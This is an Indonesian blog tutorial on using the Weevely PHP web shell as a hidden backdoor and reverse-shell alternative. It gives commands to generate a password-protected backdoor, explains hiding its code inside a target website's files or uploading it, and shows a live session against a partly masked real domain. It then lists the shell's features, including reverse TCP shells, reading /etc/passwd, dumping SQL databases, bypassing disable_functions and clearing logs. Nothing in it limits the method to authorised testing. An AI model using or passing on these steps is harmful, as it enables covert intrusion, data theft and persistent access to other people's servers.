MITM Attack, Hack HP Lewat Jaringan WIFI
Jika kalian sering menggunakan jaringan WIFI publik yang terbuka dan dapat …
Weevely adalah PHP web shell backdor yang mensimulasikan koneksi seperti telnet. Ini adalah alat penting untuk eksploitasi pasca aplikasi web, dan dapat digunakan sebagai pintu belakang tersembunyi atau sebagai cangkang web untuk mengelola akun web yang sah, bahkan yang dihosting secara gratis.
Alat ini bisa kita gunakan sebagai pengganti back connect atau reverse shell ketika kita menemukan web server yang tidak dapat melakukan back connect, maka cara alternatifnya kita bisa menggunakan weevely sebagai reverse shell sekaligus backdor tersembunyi.
Fitur:
Alat ini bisa kita install melalui repository github project tools dari weevely, atau jika kalian adalah pengguna Kali Linux bisa kita instalasi dengan simple melalui cara di bawah ini.
sudo apt-get install weevely
weevely
┌─[zidan@ubuntu] ∞ [~]>
└─[$]> weevely
[+] weevely 4.0.1
[!] Error: the following arguments are required: url, password
[+] Run terminal or command on the target
weevely <URL> <password> [cmd]
[+] Recover an existing session
weevely session <path> [cmd]
[+] Generate new agent
weevely generate <password> <path>
Disana tertulis rangkuman dari cara pemakaian tools, pertama kita buat terlebih dahulu php webshell dari weevely dengan menggunakan command di bawah ini.
weevely generate xploit1337 bc.php
Untuk passwordnya xploit1337 dan nama file backdor bc.php bisa kalian ubah sesuai keinginan kalian sendiri, atau bisa di samakan juga seperti pada artikel ini.
Kemudian cek pada directory tempat kalian menjalankan tools weevely akan terdapat 1 file backdor yang barusan kita buat yaitu ‘bc.php’, kemudian buka menggunakan mousepad atau gedit.
Jika kalian ingin membuat backdor tersembunyi maka kita perlu menyalin isi files dari backdor yang sudah kita buat tadi ke dalam salah satu files yang ada pada web atau hosting target. Selama code tsb tidak terdeteksi maka kita akan bisa melakukan RCE (Remote Code Execution) melalui weevely. Atau bisa kita upload saja files backdor stb pada website target, kemudian untuk cara eksekusinya kita jalankan perintah di bawah ini.
weevely https://k******resmi.com/bc.php xploit1337
┌─[zidan@ubuntu] ∞ [~]>
└─[$]> weevely https://k******resmi.com/bc.php xploit1337
[+] weevely 4.0.1
[+] Target: k******resmi.com
[+] Session: /home/zidan/.weevely/sessions/k******resmi.com/bc_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely>
Kemudian kita coba jalankan perintah ls untuk melihat isi dir dari website yang sudah kita tanamkan backdor reverse shell weevely. Jika menampilkan isi dari directory web maka kita berhasil melakukan reverse shell dengan menggunakan weevely.
Untuk penggunaan lebih lanjut pada tools weevely, kalian ketik help disana akan muncul cara pemakaian dan cara penggunaan fitur lainnya yang disediakan oleh weevely.
┌─[zidan@ubuntu] ∞ [~]>
└─[$]> weevely https://k******resmi.com/bc.php xploit1337
[+] weevely 4.0.1
[+] Target: k*****sco@t**h.a***ab.co.id:/home/k*****sco/public_html
[+] Session: /home/zidan/.weevely/sessions/k******resmi.com/bc_0.session
[+] Shell: System shell
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> help
:file_read Read remote file from the remote filesystem.
:file_check Get attributes and permissions of a file.
:file_cp Copy single file.
:file_cd Change current working directory.
:file_clearlog Remove string from a file.
:file_edit Edit remote file on a local editor.
:file_download Download file from remote filesystem.
:file_gzip Compress or expand gzip files.
:file_mount Mount remote filesystem using HTTPfs.
:file_enum Check existence and permissions of a list of paths.
:file_zip Compress or expand zip files.
:file_find Find files with given names and attributes.
:file_grep Print lines matching a pattern in multiple files.
:file_upload2web Upload file automatically to a web folder and get corresponding URL.
:file_upload Upload file to remote filesystem.
:file_bzip2 Compress or expand bzip2 files.
:file_touch Change file timestamp.
:file_tar Compress or expand tar archives.
:file_webdownload Download an URL.
:file_ls List directory content.
:file_rm Remove remote file.
:net_scan TCP Port scan.
:net_curl Perform a curl-like HTTP request.
:net_phpproxy Install PHP proxy on the target.
:net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the target.
:net_mail Send mail.
:net_ifconfig Get network interfaces addresses.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
:bruteforce_sql Bruteforce SQL database.
:sql_dump Multi dbms mysqldump replacement.
:sql_console Execute SQL query or run console.
:system_extensions Collect PHP and webserver extension list.
:system_procs List running processes.
:system_info Collect system information.
:audit_phpconf Audit PHP configuration.
:audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess.
:audit_filesystem Audit the file system for weak permissions.
:audit_suidsgid Find files with SUID or SGID flags.
:audit_etcpasswd Read /etc/passwd with different techniques.
:shell_php Execute PHP commands.
:shell_sh Execute shell commands.
:shell_su Execute commands with su.
k*****sco@t**h.a***ab.co.id:/home/k*****sco/public_html $
Itulah tadi cara Back Connect atau Reverse Shell alternatif dengan menggunakan tools weevely di kali linux, tools ini juga bisa kita gunakan di aplikasi android yaitu termux. Hanya saja cara instalasinya berbeda dengan cara di atas, untuk instalasi bagi pengguna termux bisa kunjungi langsung repository github weevely.